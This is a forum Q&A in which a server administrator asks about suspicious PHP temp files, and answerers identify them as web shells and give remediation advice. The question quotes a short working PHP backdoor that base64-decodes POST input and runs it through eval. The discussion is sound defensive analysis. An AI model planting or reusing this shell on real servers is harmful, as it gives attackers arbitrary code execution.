7

I have noticed that our temp directory has a number of what appear to be temporary files with names like phpA3F9.tmp

Looking into the contents I find a number followed by some PHP code, the following code appears in several files

9990000    
<?php 
    $mujj = $_POST['z']; if ($mujj!="") { $xsser=base64_decode($_POST['z0']); @eval("\$safedg = $xsser;"); } ?>

This appears to be an attack attempt, but I presume it relies on the attacker being able to execute the code in the tmp folder.

Can anybody explain what is going on here? What are the risks? How do these files get into the tmp folder? And how do I stop them?

I don't know if it is relevant but we are running PHP 5.5 on IIS

Mark_1
  • 623
  • 6
  • 16
  • That filename reminds me of MSIE temp files – Robin Kanters Dec 01 '15 at 14:38
  • Probably they are uploaded to server by attacker, and if your `upload_tmp_dir` is pointing to your temp directory, it seems that someone is trying to upload malicious code to your server. These files are deleted after script execution. – Kristian Vitozev Dec 01 '15 at 14:45

1 Answers1

7

Short story: your server may have already been compromised.

Those are PHP shells - mostly harmless where they are, but if they get into your web root, they'll allow an attacker to execute any arbitrary code on your server.

The key parts to understanding the shell are:

$xsser=base64_decode($_POST['z0']);
@eval("\$safedg = $xsser;");

It accepts any code at all from a $_POST variable, base64_decodes it, and then runs it through eval while suppressing any errors.

It's possible that they're being uploaded through a form on your site, and getting dumped in the temp folder as an intermediate step, with the hope that they would get moved into a web-accessible location. The other option is that there's already a shell or rootkit on your server, and it's putting those files in any writable folders that it can find.

So what to do about it? Check your server logs - if you see any successful connections to a script that you don't recognize, you may be compromised. Look for any upload forms on your site, and lock them down (require user authentication, etc.), and then if you're certain that you're compromised, don't bother trying to clean it. Spin up a new server, migrate your clean code, important files, and data to the clean server.

samlev
  • 5,852
  • 1
  • 26
  • 38
  • 1
    I used to work for a development+hosting company, and we had to quarantine Joomla sites to their own server because every few weeks every site would end up with a copy of `c99.php` (or something similar). They get into one site, then spread to any other world-writable folder on the server, thus being able to act as any user that has a website. We eventually ran a cron that trampled world-writable folders - ugly, but it contained infections to just one site at a time. – samlev Dec 01 '15 at 15:02